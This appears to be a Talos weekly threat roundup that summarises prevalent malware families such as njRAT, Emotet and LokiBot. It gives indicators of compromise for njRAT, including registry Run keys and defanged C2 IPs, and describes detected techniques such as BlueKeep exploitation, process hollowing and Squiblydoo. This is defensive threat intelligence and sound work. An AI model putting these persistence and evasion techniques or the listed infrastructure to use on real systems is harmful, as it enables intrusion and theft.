Today, Talos is publishing a glimpse into the most prevalent threats we've observed between July 3 and July 10. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.
As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.
For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.
The most prevalent threats highlighted in this roundup are:
Threat Name
Type
Description
Win.Packed.njRAT-8479097-0
Packed
njRAT, also known as Bladabindi, is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes and remotely turn on the victim's webcam and microphone. njRAT was developed by the Sparclyheason group. Some of the largest attacks using this malware date back to 2014.
Win.Malware.NetWire-8479400-0
Malware
NetWire is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, remote desktop, and read data from connected USB devices. NetWire is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Packed.Dridex-8486639-0
Packed
Dridex is a well-known banking trojan that aims to steal credentials and other sensitive information from an infected machine.
Win.Trojan.Fareit-8493652-0
Trojan
The Fareit trojan is primarily an information stealer that can download and install other malware.
Win.Dropper.Generickdz-8494215-0
Dropper
This is a BobSoft Delphi application that wraps malware. The malware uses process-hollowing to hide from detection and achieves persistence across reboots by leveraging an autostart key in the Windows registry.
Win.Packed.LokiBot-8568668-1
Packed
Lokibot is an information-stealing malware designed to siphon off sensitive information stored on an infected device. It is modular in nature, supporting the ability to steal sensitive information from many popular applications. It is commonly pushed via malicious documents delivered via spam emails.
Win.Trojan.Razy-8568648-0
Trojan
Razy is oftentimes a generic detection name for a Windows trojan. It collects sensitive information from the infected host and encrypt the data, and send it to a command and control (C2) server. Information collected might include screenshots. The samples modify auto-execute functionality by setting and creating a value in the registry for persistence.
Win.Malware.Emotet-8568701-0
Malware
Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails.
Threat Breakdown
Win.Packed.njRAT-8479097-0
Indicators of Compromise
IOCs collected from dynamic analysis of 25 samples
Registry Keys
Occurrences
<HKCU>\ENVIRONMENT
Value Name: SEE_MASK_NOZONECHECKS
25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: ParseAutoexec
25
<HKCU>\SOFTWARE\27B4710398AE0B763559DF62D775BA29
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 27b4710398ae0b763559df62d775ba29
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 27b4710398ae0b763559df62d775ba29
2
<HKCU>\SOFTWARE\27B4710398AE0B763559DF62D775BA29
Value Name: [kl]
2
<HKCU>\SOFTWARE\74FB347B3D36AFEEF9601FC49748F387
2
<HKCU>\SOFTWARE\74FB347B3D36AFEEF9601FC49748F387
Value Name: [kl]
2
<HKCU>\SOFTWARE\58340164489AFF059FE46AB17B861A07
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 58340164489aff059fe46ab17b861a07
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 58340164489aff059fe46ab17b861a07
2
<HKCU>\SOFTWARE\58340164489AFF059FE46AB17B861A07
Value Name: [kl]
2
<HKCU>\SOFTWARE\3073A267DD6BA57599509E1FC89383AB
2
<HKCU>\SOFTWARE\3073A267DD6BA57599509E1FC89383AB
Value Name: [kl]
2
<HKCU>\SOFTWARE\F53BD214B970381275BB6CE3C71B0345
Value Name: [kl]
1
<HKCU>\SOFTWARE\7D37CA2C4B7AFA2D4D222003A595ED82
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 7d37ca2c4b7afa2d4d222003a595ed82
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 7d37ca2c4b7afa2d4d222003a595ed82
1
<HKCU>\SOFTWARE\7D37CA2C4B7AFA2D4D222003A595ED82
Value Name: [kl]
1
<HKCU>\SOFTWARE\B8ECBB9B55BF8E520EA66CE3B1D1F053
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: b8ecbb9b55bf8e520ea66ce3b1d1f053
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: b8ecbb9b55bf8e520ea66ce3b1d1f053
1
<HKCU>\SOFTWARE\B8ECBB9B55BF8E520EA66CE3B1D1F053
Value Name: [kl]
1
<HKCU>\SOFTWARE\7003E42B55F54D8B8C83FCE037328D7A
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 7003e42b55f54d8b8c83fce037328d7a
1
Mutexes
Occurrences
<32 random hex characters>
25
IP Addresses contacted by malware. Does not indicate maliciousness
Occurrences
141[.]255[.]152[.]254
1
141[.]255[.]157[.]71
1
Domain Names contacted by malware. Does not indicate maliciousness
Exploit Prevention Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.
Dealply adware detected - (16504)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
CVE-2019-0708 detected - (3320)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
Process hollowing detected - (1859)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Excessively long PowerShell command detected - (1573)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
An attempt to bypass application whitelisting via the "Squiblydoo" technique has been detected. This typically involves using regsvr32.exe to execute script content hosted on an attacker controlled server.
Installcore adware detected - (385)
Install core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
Kovter injection detected - (206)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Palikan browser hijacker detected - (138)
Palikan is a potentially unwanted application (PUA), browser hijacker, a type of malware that most of the time does not explicitly or completely state its function or purpose. When is present on the system, it may change the default homepage, change the search engine, redirect traffic to malicious sites, install add-ons, extensions, or plug-ins, open unwanted windows or show advertising. Palikan commonly arrives as a file dropped by other malware or as a file downloaded
unknowingly from a malicious site. It has also been closely associated with DealPly.
Gamarue malware detected - (118)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
IcedID malware detected - (71)
IcedID is a banking Trojan. It uses both web browser injection and browser redirection to steal banking and/or other financial credentials and data. The features and sophistication of IcedID demonstrate the malware author's knowledge and technical skill for this kind of fraud, and suggest the authors have previous experience creating banking Trojans. IcedID has been observed being installed by Emotet or Ursnif. Systems infected with IcedID should also be scanned for additional
malware infections.